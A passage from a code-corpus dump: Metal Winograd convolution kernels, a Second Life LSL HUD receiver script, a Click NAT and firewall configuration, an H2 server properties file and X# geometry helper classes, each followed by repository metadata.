xy_out += stride; *xy_out = +m01 - 1.25 * m21 + 0.25 * m41;
xy_out += stride; *xy_out = +0.666667 * m11 + 0.666667 * m21 - 0.166667 * m31 - 0.166667 * m41;
xy_out += stride; *xy_out = -0.666667 * m11 + 0.666667 * m21 + 0.166667 * m31 - 0.166667 * m41;
xy_out += stride; *xy_out = -0.0833333 * m11 - 0.0416667 * m21 + 0.0833333 * m31 + 0.0416667 * m41;
xy_out += stride; *xy_out = +0.0833333 * m11 - 0.0416667 * m21 - 0.0833333 * m31 + 0.0416667 * m41;
xy_out += stride; *xy_out = +4.0 * m11 - 5.0 * m31 + m51;
xy_out += stride; *xy_out = +m02 - 1.25 * m22 + 0.25 * m42;
xy_out += stride; *xy_out = +0.666667 * m12 + 0.666667 * m22 - 0.166667 * m32 - 0.166667 * m42;
xy_out += stride; *xy_out = -0.666667 * m12 + 0.666667 * m22 + 0.166667 * m32 - 0.166667 * m42;
xy_out += stride; *xy_out = -0.0833333 * m12 - 0.0416667 * m22 + 0.0833333 * m32 + 0.0416667 * m42;
xy_out += stride; *xy_out = +0.0833333 * m12 - 0.0416667 * m22 - 0.0833333 * m32 + 0.0416667 * m42;
xy_out += stride; *xy_out = +4.0 * m12 - 5.0 * m32 + m52;
xy_out += stride; *xy_out = +m03 - 1.25 * m23 + 0.25 * m43;
xy_out += stride; *xy_out = +0.666667 * m13 + 0.666667 * m23 - 0.166667 * m33 - 0.166667 * m43;
xy_out += stride; *xy_out = -0.666667 * m13 + 0.666667 * m23 + 0.166667 * m33 - 0.166667 * m43;
xy_out += stride; *xy_out = -0.0833333 * m13 - 0.0416667 * m23 + 0.0833333 * m33 + 0.0416667 * m43;
xy_out += stride; *xy_out = +0.0833333 * m13 - 0.0416667 * m23 - 0.0833333 * m33 + 0.0416667 * m43;
xy_out += stride; *xy_out = +4.0 * m13 - 5.0 * m33 + m53;
xy_out += stride; *xy_out = +m04 - 1.25 * m24 + 0.25 * m44;
xy_out += stride; *xy_out = +0.666667 * m14 + 0.666667 * m24 - 0.166667 * m34 - 0.166667 * m44;
xy_out += stride; *xy_out = -0.666667 * m14 + 0.666667 * m24 + 0.166667 * m34 - 0.166667 * m44;
xy_out += stride; *xy_out = -0.0833333 * m14 - 0.0416667 * m24 + 0.0833333 * m34 + 0.0416667 * m44;
xy_out += stride; *xy_out = +0.0833333 * m14 - 0.0416667 * m24 - 0.0833333 * m34 + 0.0416667 * m44;
xy_out += stride; *xy_out = +4.0 * m14 - 5.0 * m34 + m54;
xy_out += stride; *xy_out = +m05 - 1.25 * m25 + 0.25 * m45;
xy_out += stride; *xy_out = +0.666667 * m15 + 0.666667 * m25 - 0.166667 * m35 - 0.166667 * m45;
xy_out += stride; *xy_out = -0.666667 * m15 + 0.666667 * m25 + 0.166667 * m35 - 0.166667 * m45;
xy_out += stride; *xy_out = -0.0833333 * m15 - 0.0416667 * m25 + 0.0833333 * m35 + 0.0416667 * m45;
xy_out += stride; *xy_out = +0.0833333 * m15 - 0.0416667 * m25 - 0.0833333 * m35 + 0.0416667 * m45;
xy_out += stride; *xy_out = +4.0 * m15 - 5.0 * m35 + m55;
}
}
kernel void winograd_transform_source2_3_1(const device ftype4 *in [[buffer(0)]],
device ftype4 *out [[buffer(1)]],
constant winograd_constants &cst [[buffer(2)]],
uint3 gid [[thread_position_in_grid]]) {
auto pos = int3(gid);
if (pos.x < cst.unit_width && pos.y < cst.unit_height) {
int ix = pos.x * cst.unit - cst.pad_x;
int iy = pos.y * cst.unit - cst.pad_y;
auto z_in = in + pos.z * cst.input_shape.x * cst.input_shape.y;
auto S00 = get_input(z_in, ix + 0, iy + 0, cst);
auto S10 = get_input(z_in, ix + 1, iy + 0, cst);
auto S20 = get_input(z_in, ix + 2, iy + 0, cst);
auto S30 = get_input(z_in, ix + 3, iy + 0, cst);
auto S01 = get_input(z_in, ix + 0, iy + 1, cst);
auto S11 = get_input(z_in, ix + 1, iy + 1, cst);
auto S21 = get_input(z_in, ix + 2, iy + 1, cst);
auto S31 = get_input(z_in, ix + 3, iy + 1, cst);
auto S02 = get_input(z_in, ix + 0, iy + 2, cst);
auto S12 = get_input(z_in, ix + 1, iy + 2, cst);
auto S22 = get_input(z_in, ix + 2, iy + 2, cst);
auto S32 = get_input(z_in, ix + 3, iy + 2, cst);
auto S03 = get_input(z_in, ix + 0, iy + 3, cst);
auto S13 = get_input(z_in, ix + 1, iy + 3, cst);
auto S23 = get_input(z_in, ix + 2, iy + 3, cst);
auto S33 = get_input(z_in, ix + 3, iy + 3, cst);
auto m00 = +S00 - S02;
auto m10 = +S10 - S12;
auto m20 = +S20 - S22;
auto m30 = +S30 - S32;
auto m01 = +0.5 * S01 + 0.5 * S02;
auto m11 = +0.5 * S11 + 0.5 * S12;
auto m21 = +0.5 * S21 + 0.5 * S22;
auto m31 = +0.5 * S31 + 0.5 * S32;
auto m02 = -0.5 * S01 + 0.5 * S02;
auto m12 = -0.5 * S11 + 0.5 * S12;
auto m22 = -0.5 * S21 + 0.5 * S22;
auto m32 = -0.5 * S31 + 0.5 * S32;
auto m03 = -S01 + S03;
auto m13 = -S11 + S13;
auto m23 = -S21 + S23;
auto m33 = -S31 + S33;
int dst_x_origin = pos.z;
int dst_y_origin = cst.unit_width * pos.y + pos.x;
int dst_y_stride = cst.input_shape.z * 4;
int dst_y = dst_y_origin / 4;
int dst_x = dst_y_origin % 4 + 4 * dst_x_origin;
int src_height = UP_DIV(cst.unit_width * cst.unit_height, 4);
int stride = src_height * dst_y_stride;
auto xy_out = out + dst_y * dst_y_stride + dst_x;
*xy_out = +m00 - m20;
xy_out += stride; *xy_out = +0.5 * m10 + 0.5 * m20;
xy_out += stride; *xy_out = -0.5 * m10 + 0.5 * m20;
xy_out += stride; *xy_out = -m10 + m30;
xy_out += stride; *xy_out = +m01 - m21;
xy_out += stride; *xy_out = +0.5 * m11 + 0.5 * m21;
xy_out += stride; *xy_out = -0.5 * m11 + 0.5 * m21;
xy_out += stride; *xy_out = -m11 + m31;
xy_out += stride; *xy_out = +m02 - m22;
xy_out += stride; *xy_out= +0.5 * m12 + 0.5 * m22;
xy_out += stride; *xy_out = -0.5 * m12 + 0.5 * m22;
xy_out += stride; *xy_out = -m12 + m32;
xy_out += stride; *xy_out = +m03 - m23;
xy_out += stride; *xy_out = +0.5 * m13 + 0.5 * m23;
xy_out += stride; *xy_out = -0.5 * m13 + 0.5 * m23;
xy_out += stride; *xy_out = -m13 + m33;
}
}
static inline void set_output(constant winograd_constants &cst, device ftype4 *output, int x, int y, ftype4 value) {
output[y * cst.output_shape.x + x] = activate(value, cst.activation);
}
kernel void winograd_transform_dest2_5_1(const device ftype4 *in [[buffer(0)]],
const device ftype4 *biasTerms [[buffer(1)]],
device ftype4 *out [[buffer(2)]],
constant winograd_constants &cst [[buffer(3)]],
uint3 gid [[thread_position_in_grid]]) {
auto pos = int3(gid);
if (pos.x < cst.unit_width && pos.y < cst.unit_height) {
int dst_w = UP_DIV(cst.unit_width * cst.unit_height, 4);
int dst_x_origin = cst.unit_width * pos.y + pos.x;
int dst_x = dst_x_origin / 4;
int dst_y = 4 * pos.z + dst_x_origin % 4;
int dst_y_stride = dst_w * 36;
auto xy_in = in + dst_y * dst_y_stride + dst_x;
auto S00 = *xy_in; xy_in += dst_w;
auto S10 = *xy_in; xy_in += dst_w;
auto S20 = *xy_in; xy_in += dst_w;
auto S30 = *xy_in; xy_in += dst_w;
auto S40 = *xy_in; xy_in += dst_w;
auto S50 = *xy_in; xy_in += dst_w;
auto S01 = *xy_in; xy_in += dst_w;
auto S11 = *xy_in; xy_in += dst_w;
auto S21 = *xy_in; xy_in += dst_w;
auto S31 = *xy_in; xy_in += dst_w;
auto S41 = *xy_in; xy_in += dst_w;
auto S51 = *xy_in; xy_in += dst_w;
auto S02 = *xy_in; xy_in += dst_w;
auto S12 = *xy_in; xy_in += dst_w;
auto S22 = *xy_in; xy_in += dst_w;
auto S32 = *xy_in; xy_in += dst_w;
auto S42 = *xy_in; xy_in += dst_w;
auto S52 = *xy_in; xy_in += dst_w;
auto S03 = *xy_in; xy_in += dst_w;
auto S13 = *xy_in; xy_in += dst_w;
auto S23 = *xy_in; xy_in += dst_w;
auto S33 = *xy_in; xy_in += dst_w;
auto S43 = *xy_in; xy_in += dst_w;
auto S53 = *xy_in; xy_in += dst_w;
auto S04 = *xy_in; xy_in += dst_w;
auto S14 = *xy_in; xy_in += dst_w;
auto S24 = *xy_in; xy_in += dst_w;
auto S34 = *xy_in; xy_in += dst_w;
auto S44 = *xy_in; xy_in += dst_w;
auto S54 = *xy_in; xy_in += dst_w;
auto S05 = *xy_in; xy_in += dst_w;
auto S15 = *xy_in; xy_in += dst_w;
auto S25 = *xy_in; xy_in += dst_w;
auto S35 = *xy_in; xy_in += dst_w;
auto S45 = *xy_in; xy_in += dst_w;
auto S55 = *xy_in;
auto m00 = +S00 + S01 + S02 + S03 + S04;
auto m10 = +S10 + S11 + S12 + S13 + S14;
auto m20 = +S20 + S21 + S22 + S23 + S24;
auto m30 = +S30 + S31 + S32 + S33 + S34;
auto m40 = +S40 + S41 + S42 + S43 + S44;
auto m50 = +S50 + S51 + S52 + S53 + S54;
auto m01 = +S01 - S02 + 2.0 * S03 - 2.0 * S04 + S05;
auto m11 = +S11 - S12 + 2.0 * S13 - 2.0 * S14 + S15;
auto m21 = +S21 - S22 + 2.0 * S23 - 2.0 * S24 + S25;
auto m31 = +S31 - S32 + 2.0 * S33 - 2.0 * S34 + S35;
auto m41 = +S41 - S42 + 2.0 * S43 - 2.0 * S44 + S45;
auto m51 = +S51 - S52 + 2.0 * S53 - 2.0 * S54 + S55;
// write output
auto b4 = biasTerms[int(pos.z)];
int oy = pos.y * cst.unit;
int ox = pos.x * cst.unit;
auto z_out = out + pos.z * cst.output_shape.x * cst.output_shape.y;
/* if true */ {
set_output(cst, z_out, ox + 0, oy + 0, b4 + m00 + m10 + m20 + m30 + m40);
}
if (ox + 1 < cst.output_shape.x) {
set_output(cst, z_out, ox + 1, oy + 0, b4 + m10 - m20 + 2.0 * m30 - 2.0 * m40 + m50);
}
if (oy + 1 < cst.output_shape.y) {
set_output(cst, z_out, ox + 0, oy + 1, b4 + m01 + m11 + m21 + m31 + m41);
}
if (ox + 1 < cst.output_shape.x && oy + 1 < cst.output_shape.y) {
set_output(cst, z_out, ox + 1, oy + 1, b4 + m11 - m21 + 2.0 * m31 - 2.0 * m41 + m51);
}
}
}
kernel void winograd_transform_dest2_3_1(const device ftype4 *in [[buffer(0)]],
const device ftype4 *biasTerms [[buffer(1)]],
device ftype4 *out [[buffer(2)]],
constant winograd_constants &cst [[buffer(3)]],
uint3 gid [[thread_position_in_grid]]) {
auto pos = int3(gid);
if (pos.x < cst.unit_width && pos.y < cst.unit_height) {
int dst_w = UP_DIV(cst.unit_width * cst.unit_height, 4);
int dst_x_origin = cst.unit_width * pos.y + pos.x;
int dst_x = dst_x_origin / 4;
int dst_y = 4 * pos.z + dst_x_origin % 4;
int dst_y_stride = dst_w * 16;
auto xy_in = in + dst_y * dst_y_stride + dst_x;
auto S00 = *xy_in; xy_in += dst_w;
auto S10 = *xy_in; xy_in += dst_w;
auto S20 = *xy_in; xy_in += dst_w;
auto S30 = *xy_in; xy_in += dst_w;
auto S01 = *xy_in; xy_in += dst_w;
auto S11 = *xy_in; xy_in += dst_w;
auto S21 = *xy_in; xy_in += dst_w;
auto S31 = *xy_in; xy_in += dst_w;
auto S02 = *xy_in; xy_in += dst_w;
auto S12 = *xy_in; xy_in += dst_w;
auto S22 = *xy_in; xy_in += dst_w;
auto S32 = *xy_in; xy_in += dst_w;
auto S03 = *xy_in; xy_in += dst_w;
auto S13 = *xy_in; xy_in += dst_w;
auto S23 = *xy_in; xy_in += dst_w;
auto S33 = *xy_in;
auto m00 = +S00 + S01 + S02;
auto m10 = +S10 + S11 + S12;
auto m20 = +S20 + S21 + S22;
auto m30 = +S30 + S31 + S32;
auto m01 = +S01 - S02 + S03;
auto m11 = +S11 - S12 + S13;
auto m21 = +S21 - S22 + S23;
auto m31 = +S31 - S32 + S33;
// write output
auto b4 = biasTerms[int(pos.z)];
int oy = pos.y * cst.unit;
int ox = pos.x * cst.unit;
auto z_out = out + pos.z * cst.output_shape.x * cst.output_shape.y;
/* if true */ {
set_output(cst, z_out, ox + 0, oy + 0, b4 + m00 + m10 + m20);
}
if (ox + 1 < cst.output_shape.x) {
set_output(cst, z_out, ox + 1, oy + 0, b4 + m10 - m20 + m30);
}
if (oy + 1 < cst.output_shape.y) {
set_output(cst, z_out, ox + 0, oy + 1, b4 + m01 + m11 + m21);
}
if (ox + 1 < cst.output_shape.x && oy + 1 < cst.output_shape.y) {
set_output(cst, z_out, ox + 1, oy + 1, b4 + m11 - m21 + m31);
}
}
}
| Metal | 5 | xhuan28/MNN | source/backend/metal/MetalConvolutionWinograd.metal | [
"Apache-2.0"
] |
// Ruth 2.0 HUD Receiver
// SPDX-License-Identifier: AGPL-3.0-or-later
//** Copyright 2017 Shin Ingen
//** Copyright 2019 Serie Sumei
// This is a heavily modified version of Shin's RC3 receiver scripts for
// head, body, hands and feet combined into one.
//
// It has some requirements of the hands and feet mesh similar to that already
// on the body with regard to linking and prim naming. Link order does not
// matter, everything works based on the prim name and description fields.
// The body part is identified by looking for specific names in the linkset
// during the initial scan: "chest" (for the body), "feet", "hands", "head".
// This implies that the hands and feet need to be linked to a root prim in
// order for the actual mesh parts to have the right name. The body already
// has this requirement so we can use the same root prim cube here too.
// The commands have been expanded a bit to allow more flexibility in texturing
// the parts. It is still totally compatible with the RC2 and RC3 commands
// provided the APP_ID is correct (we will handle that soon too).
// v1 26Jan2019 <seriesumei@avimail.org> - Initial combination of body, feet
// and hands scripts, includes fingernails
// v2 03Feb2019 <seriesumei@avimail.org> - Reset script on ownership change,
// listen on multiple APP_IDs
// v3 09Feb2019 <seriesumei@avimail.org> - Add XTEA support
// v4 06Apr2019 <seriesumei@avimail.org> - Fix initialization bug in OpenSim
// The app ID is used on calculating the actual channel number used for communication
// and must match in both the HUD and receivers.
integer APP_ID = 20181024;
integer APP_ID_ALT1 = 20171105;
integer MULTI_LISTEN = TRUE;
// Which API version do we implement?
integer API_VERSION = 2;
// The body part types are used to track which type the script is handling
// and is inferred at start-up by looking for specific names in the linkset.
// Override this by directly setting PART_TYPE_DEFAULT below.
integer PART_TYPE_NULL = 0;
integer PART_TYPE_BODY = 1;
integer PART_TYPE_HANDS = 2;
integer PART_TYPE_FEET = 3;
integer PART_TYPE_DEFAULT = 0;
integer part_type;
// Map prim name and descriptions to link numbers
list prim_map = [];
list prim_desc = [];
// Spew some info
integer VERBOSE = FALSE;
// Memory limit
integer MEM_LIMIT = 32000;
// The name of the XTEA script
string XTEA_NAME = "r2_xtea";
// Set to encrypt 'message' and re-send on channel 'id'
integer XTEAENCRYPT = 13475896;
// Set in the reply to a received XTEAENCRYPT if the passed channel is 0 or ""
integer XTEAENCRYPTED = 8303877;
// Set to decrypt 'message' and reply vi llMessageLinked()
integer XTEADECRYPT = 4690862;
// Set in the reply to a received XTEADECRYPT
integer XTEADECRYPTED = 3450924;
integer haz_xtea = FALSE;
// save the listen handles
integer listen_main;
integer listen_alt1;
integer r2channel;
integer r2channel_alt1;
integer last_attach = 0;
log(string msg) {
if (VERBOSE == 1) {
llOwnerSay(msg);
}
}
integer can_haz_xtea() {
// See if the XTEA script is present in object inventory
integer count = llGetInventoryNumber(INVENTORY_SCRIPT);
while (count--) {
if (llGetInventoryName(INVENTORY_SCRIPT, count) == XTEA_NAME) {
llOwnerSay("Found XTEA script");
return TRUE;
}
}
return FALSE;
}
send(string msg) {
llSay(r2channel+1, msg);
if (VERBOSE == 1) {
llOwnerSay("S: " + msg);
}
}
send_csv(list msg) {
send(llList2CSV(msg));
}
// Calculate a channel number based on APP_ID and owner UUID
integer keyapp2chan(integer id) {
return 0x80000000 | ((integer)("0x" + (string)llGetOwner()) ^ id);
}
map_linkset() {
// Create map of all links to prim names
integer i = 0;
integer num_links = llGetNumberOfPrims() + 1;
for (; i < num_links; ++i) {
list p = llGetLinkPrimitiveParams(i, [PRIM_NAME, PRIM_DESC]);
prim_map += [llToUpper(llList2String(p, 0))];
prim_desc += [llToUpper(llList2String(p, 1))];
}
}
// ALPHA,<target>,<face>,<alpha>
do_alpha(list args) {
if (llGetListLength(args) > 3) {
string target = llStringTrim(llToUpper(llList2String(args, 1)), STRING_TRIM);
integer face = llList2Integer(args, 2);
float alpha = llList2Float(args, 3);
integer link = llListFindList(prim_map, [target]);
integer found = FALSE;
if (link > -1) {
// Found a matching part name, use it
found = TRUE;
}
// Override link on hands and feet
if (part_type == PART_TYPE_HANDS && target == "HANDS") {
link = LINK_ALL_CHILDREN;
found = TRUE;
}
else if (part_type == PART_TYPE_FEET && target == "FEET") {
link = LINK_ALL_CHILDREN;
found = TRUE;
}
if (found) {
llSetLinkAlpha(link, alpha, face);
}
}
}
// STATUS,<hud-api-version>
do_status(list args) {
send_csv(["STATUS", API_VERSION, part_type, last_attach]);
}
// TEXTURE,<target>,<texture>[,<face>,<color>]
do_texture(list args) {
// Check for v1 args
if (llGetListLength(args) >= 3) {
string target = llStringTrim(llToUpper(llList2String(args, 1)), STRING_TRIM);
string texture = llList2String(args, 2);
integer face;
vector color;
integer has_color = FALSE;
if (llGetListLength(args) > 3) {
has_color = TRUE;
// Get v2 face
face = llList2Integer(args, 3);
// Get v2 color arg
color = (vector)llList2String(args, 4);
}
if (llListFindList(["FINGERNAILS", "HEAD", "LOWER", "TOENAILS", "UPPER"], [target]) < 0) {
log(" prim="+target);
// Search for a prim name
integer prim = llListFindList(prim_map, [target]);
if (prim > -1) {
llSetLinkColor(prim, color, face);
}
} else {
integer i;
integer x = llGetListLength(prim_desc);
for (; i < x; ++i) {
string objdesc = llList2String(prim_desc, i);
if (objdesc == target) {
if (texture != "") {
llSetLinkPrimitiveParamsFast(
i,
[
PRIM_TEXTURE,
ALL_SIDES,
texture,
<1,1,0>,
<0,0,0>,
0
]
);
}
if (has_color) {
llSetLinkColor(i, color, face);
}
}
}
}
}
}
default {
state_entry() {
haz_xtea = can_haz_xtea();
// Initialize attach state
last_attach = llGetAttached();
log("state_entry() attached="+(string)last_attach);
map_linkset();
// Deduce part type from the linked names
part_type = PART_TYPE_DEFAULT;
if (~llListFindList(prim_map, ["CHEST"])) {
part_type = PART_TYPE_BODY;
}
else if (~llListFindList(prim_map, ["HANDS"])) {
part_type = PART_TYPE_HANDS;
}
else if (~llListFindList(prim_map, ["FEET"])) {
part_type = PART_TYPE_FEET;
}
// Set up listener
r2channel = keyapp2chan(APP_ID);
listen_main = llListen(r2channel, "", "", "");
if (MULTI_LISTEN) {
r2channel_alt1 = keyapp2chan(APP_ID_ALT1);
listen_alt1 = llListen(r2channel_alt1, "", "", "");
}
if (part_type == PART_TYPE_HANDS) {
llRequestPermissions(llGetOwner(), PERMISSION_TRIGGER_ANIMATION);
}
log("Free memory " + (string)llGetFreeMemory() + " Limit: " + (string)MEM_LIMIT);
}
run_time_permissions(integer perm) {
if (part_type == PART_TYPE_BODY && (perm & PERMISSION_TRIGGER_ANIMATION)) {
llStopAnimation("bentohandrelaxedP1");
llStartAnimation("bentohandrelaxedP1");
llSetTimerEvent(3);
}
}
timer() {
llSetTimerEvent(0);
if (part_type == PART_TYPE_HANDS) {
llRequestPermissions(llGetOwner(), PERMISSION_TRIGGER_ANIMATION);
}
}
listen(integer channel, string name, key id, string message) {
if (llGetOwnerKey(id) == llGetOwner()) {
if (channel == r2channel || channel == r2channel_alt1) {
log("R: " + message);
list cmdargs = llCSV2List(message);
string command = llToUpper(llList2String(cmdargs, 0));
if (command == "ALPHA") {
do_alpha(cmdargs);
}
else if (command == "STATUS") {
do_status(cmdargs);
}
else if (command == "TEXTURE") {
do_texture(cmdargs);
}
else {
if (haz_xtea) {
llMessageLinked(LINK_THIS, XTEADECRYPT, message, "");
}
}
}
}
}
link_message(integer sender_number, integer number, string message, key id) {
if (number == XTEADECRYPTED) {
list cmdargs = llCSV2List(message);
string command = llToUpper(llList2String(cmdargs, 0));
// handle decrypted message
// ...
}
}
changed(integer change) {
if (change & (CHANGED_OWNER | CHANGED_INVENTORY)) {
llResetScript();
}
}
}
| LSL | 5 | seriesumei/test-Ruth2 | Contrib/Serie Sumei/ru2HUD_receiver.lsl | [
"MIT"
] |
// This Click configuration implements a firewall and NAT, roughly based on the
// mazu-nat.click example.
//
// This example assumes there is one interface that is IP-aliased. In this
// example, eth0 and eth0:0 have IP addresses 66.68.65.90 and 192.168.1.1,
// respectively. There is a local network, 192.168.1.0/24, and an upstream
// gateway, 66.58.65.89. Traffic from the local network is NATed.
//
// Connections can be initiated from the NAT box itself, also.
//
// For bugs, suggestions, and, corrections, please email me.
//
// Author: Thomer M. Gil (click@thomer.com)
AddressInfo(
eth0-in 192.168.1.1 192.168.1.0/24 00:0d:87:9d:1c:e9,
eth0-ex 66.58.65.90 00:0d:87:9d:1c:e9,
gw-addr 66.58.65.89 00:20:6f:14:54:c2
);
elementclass SniffGatewayDevice {
$device |
from :: FromDevice($device)
-> t1 :: Tee
-> output;
input -> q :: Queue(1024)
-> t2 :: PullTee
-> to :: ToDevice($device);
t1[1] -> ToHostSniffers;
t2[1] -> ToHostSniffers($device);
ScheduleInfo(from .1, to 1);
}
device :: SniffGatewayDevice(eth0);
arpq_in :: ARPQuerier(eth0-in) -> device;
ip_to_extern :: GetIPAddress(16)
-> CheckIPHeader
-> EtherEncap(0x800, eth0-ex, gw-addr)
-> device;
ip_to_host :: EtherEncap(0x800, gw-addr, eth0-ex)
-> ToHost;
ip_to_intern :: GetIPAddress(16)
-> CheckIPHeader
-> arpq_in;
arp_class :: Classifier(
12/0806 20/0001, // [0] ARP requests
12/0806 20/0002, // [1] ARP replies to host
12/0800); // [2] IP packets
device -> arp_class;
// ARP crap
arp_class[0] -> ARPResponder(eth0-in, eth0-ex) -> device;
arp_class[1] -> arp_t :: Tee;
arp_t[0] -> ToHost;
arp_t[1] -> [1]arpq_in;
// IP packets
arp_class[2] -> Strip(14)
-> CheckIPHeader
-> ipclass :: IPClassifier(dst host eth0-ex,
dst host eth0-in,
src net eth0-in);
// Define pattern NAT
iprw :: IPRewriterPatterns(NAT eth0-ex 50000-65535 - -);
// Rewriting rules for UDP/TCP packets
// output[0] rewritten to go into the wild
// output[1] rewritten to come back from the wild or no match
rw :: IPRewriter(pattern NAT 0 1,
pass 1);
// Rewriting rules for ICMP packets
irw :: ICMPPingRewriter(eth0-ex, -);
irw[0] -> ip_to_extern;
irw[1] -> icmp_me_or_intern :: IPClassifier(dst host eth0-ex, -);
icmp_me_or_intern[0] -> ip_to_host;
icmp_me_or_intern[1] -> ip_to_intern;
// Rewriting rules for ICMP error packets
ierw :: ICMPRewriter(rw irw);
ierw[0] -> icmp_me_or_intern;
ierw[1] -> icmp_me_or_intern;
// Packets directed at eth0-ex.
// Send it through IPRewriter(pass). If there was a mapping, it will be
// rewritten such that dst is eth0-in:net, otherwise dst will still be for
// eth0-ex.
ipclass[0] -> [1]rw;
// packets that were rewritten, heading into the wild world.
rw[0] -> ip_to_extern;
// packets that come back from the wild or are not part of an established
// connection.
rw[1] -> established_class :: IPClassifier(dst host eth0-ex,
dst net eth0-in);
// not established yet or returning packets for a connection that was
// established from this host itself.
established_class[0] ->
firewall :: IPClassifier(dst tcp port ssh,
dst tcp port smtp,
dst tcp port domain,
dst udp port domain,
icmp type echo-reply,
proto icmp,
port > 4095,
-);
firewall[0] -> ip_to_host; // ssh
firewall[1] -> ip_to_host; // smtp
firewall[2] -> ip_to_host; // domain (t)
firewall[3] -> ip_to_host; // domain (u)
firewall[4] -> [0]irw; // icmp reply
firewall[5] -> [0]ierw; // other icmp
firewall[6] -> ip_to_host; // port > 4095, probably for connection
// originating from host itself
firewall[7] -> Discard; // don't allow incoming for port <= 4095
// established connection
established_class[1] -> ip_to_intern;
// To eth0-in. Only accept from inside network.
ipclass[1] -> IPClassifier(src net eth0-in) -> ip_to_host;
// Packets from eth0-in:net either stay on local network or go to the wild.
// Those that go into the wild need to go through the appropriate rewriting
// element. (Either UDP/TCP rewriter or ICMP rewriter.)
ipclass[2] -> inter_class :: IPClassifier(dst net eth0-in, -);
inter_class[0] -> ip_to_intern;
inter_class[1] -> ip_udp_class :: IPClassifier(tcp or udp,
icmp type echo);
ip_udp_class[0] -> [0]rw;
ip_udp_class[1] -> [0]irw;
| Click | 5 | JavascriptID/sourcerer-app | src/test/resources/samples/langs/Click/thomer-nat.click | [
"MIT"
] |
#H2 Server Properties
#Tue Oct 16 03:48:16 BRT 2018
0=JHipster H2 (Disk)|org.h2.Driver|jdbc\:h2\:file\:./target/h2db/db/gateway|gateway
webAllowOthers=true
webPort=8082
webSSL=false
| INI | 2 | DBatOWL/tutorials | jhipster/jhipster-uaa/gateway/src/main/resources/.h2.server.properties | [
"MIT"
] |
USING System.Diagnostics
[DebuggerStepThrough];
[DebuggerDisplay("{iInt1}, {iInt2}")];
CLASS Pair INHERIT VObject
PROTECT iInt1 AS INT
PROTECT iInt2 AS INT
CONSTRUCTOR() STRICT
SUPER()
CONSTRUCTOR(Int1 AS INT, Int2 AS INT)
SUPER()
iInt1 := Int1
iInt2 := Int2
RETURN
ACCESS Empty AS LOGIC
RETURN iInt1 == 0 .and. iInt2 == 0
// OPERATOR ==( lhs AS Pair, rhs AS Pair ) AS LOGIC
// RETURN lhs:Equals( rhs )
// OPERATOR !=( lhs AS Pair, rhs AS Pair ) AS LOGIC
// RETURN ! lhs:Equals( rhs )
// METHOD Equals( p AS Pair ) AS LOGIC
// LOCAL ret AS LOGIC
// ret := (p:iInt1 == iInt1 .and. p:iInt2 == iInt2)
// RETURN ret
// METHOD Equals( p AS OBJECT ) AS LOGIC
// RETURN SELF:Equals( (Pair) p)
METHOD GetHashCode AS LONG STRICT
return iInt1:GetHashCode() + iInt2:GetHashCode()
END CLASS
[DebuggerStepThrough];
[DebuggerDisplay("Width: {Width}, Height: {Height}")];
CLASS Dimension INHERIT Pair
CONSTRUCTOR() STRICT
SUPER()
CONSTRUCTOR(nWidth AS INT, nHeight AS INT)
SUPER(nWidth, nHeight)
RETURN
PROPERTY Width AS LONGINT GET iInt1 SET iInt1 := Value
PROPERTY Height AS LONGINT GET iInt2 SET iInt2 := Value
METHOD Clone() AS Dimension
RETURN Dimension{SELF:Width, SELF:Height}
OPERATOR IMPLICIT ( s AS System.Drawing.Size) AS Dimension
RETURN Dimension{s:Width, s:Height}
OPERATOR IMPLICIT ( d AS Dimension ) AS System.Drawing.Size
//IF d == NULL_OBJECT
// RETURN System.Drawing.Size.Empty
//ENDIF
RETURN System.Drawing.Size{d:Width, d:Height}
OPERATOR IMPLICIT ( r AS System.Drawing.Rectangle) AS Dimension
RETURN Dimension{r:Width, r:Height}
END CLASS
[DebuggerStepThrough];
[DebuggerDisplay("X: {X}, Y: {Y}")];
CLASS Point INHERIT Pair
CONSTRUCTOR() STRICT
SUPER()
RETURN
CONSTRUCTOR(nX AS INT, nY AS INT)
SUPER(nX, nY)
RETURN
METHOD ConvertToScreen(hWnd AS IntPtr) AS LOGIC
RETURN SELF:ConvertToScreen(hWnd, TRUE)
METHOD ConvertToScreen(hWnd AS IntPtr, lWinRect AS LOGIC) AS LOGIC
//Todo ConvertToScreen
LOCAL sPoint := WINPOINT{} AS WINPOINT
IF hWnd = IntPtr.Zero
RETURN FALSE
ENDIF
sPoint:x := iInt1
sPoint:y := iInt2
GuiWin32.ClientToScreen(hWnd, REF sPoint)
iInt1 := sPoint:x
iInt2 := sPoint:y
RETURN TRUE
METHOD ConvertToScreen(oWindow AS OBJECT) AS LOGIC
LOCAL hWnd AS PTR
LOCAL lOk AS LOGIC
IF IsInstanceOfUsual(oWindow, #Window)
hWnd := oWindow:Handle(4)
lOk := SELF:ConvertToScreen(hWnd, TRUE)
ELSEIF IsInstanceOfUsual(oWindow, #Control)
hWnd := oWindow:Handle()
lOk := SELF:ConvertToScreen(hWnd, FALSE)
ELSE
lOk := FALSE
ENDIF
RETURN lOk
PROPERTY X AS LONGINT GET iInt1 SET iInt1 := Value
PROPERTY Y AS LONGINT GET iInt2 SET iInt2 := Value
METHOD Clone() AS Point
RETURN Point{SELF:X, SELF:Y}
OPERATOR IMPLICIT ( p AS System.Drawing.Point) AS Point
RETURN Point{p:X, p:Y}
OPERATOR IMPLICIT ( p AS Point ) AS System.Drawing.Point
//IF p == NULL_OBJECT
// RETURN System.Drawing.Point.Empty
//ENDIF
RETURN System.Drawing.Point{p:X, p:Y}
OPERATOR + (p1 AS Point, p2 AS Point) AS Point
LOCAL r AS Point
IF p2:Empty
RETURN p1
ELSE
r := p1:Clone()
r:iInt1 += p2:iInt1
r:iInt2 += p2:iInt2
RETURN r
ENDIF
OPERATOR - (p1 AS Point, p2 AS Point) AS Point
LOCAL r AS Point
IF p2:Empty
RETURN p1
ELSE
r := p1:Clone()
r:iInt1 -= p2:iInt1
r:iInt2 -= p2:iInt2
RETURN r
ENDIF
END CLASS
[DebuggerStepThrough];
[DebuggerDisplay("Min: {Min}, Max: {Max}")];
CLASS Range INHERIT Pair
CONSTRUCTOR(nMin, nMax)
SUPER(nMin, nMax)
RETURN
METHOD IsInRange(nValue AS INT) AS LOGIC
LOCAL iVal AS INT
iVal := nValue
IF iVal >= iInt1 .AND. iVal <= iInt2
RETURN TRUE
ENDIF
RETURN FALSE
PROPERTY Min AS LONGINT GET iInt1 SET iInt1 := Value
PROPERTY Max AS LONGINT GET iInt2 SET iInt2 := Value
END CLASS
[DebuggerStepThrough];
[DebuggerDisplay("Start: {Start}, Finish: {Finish}")];
CLASS Selection INHERIT Pair
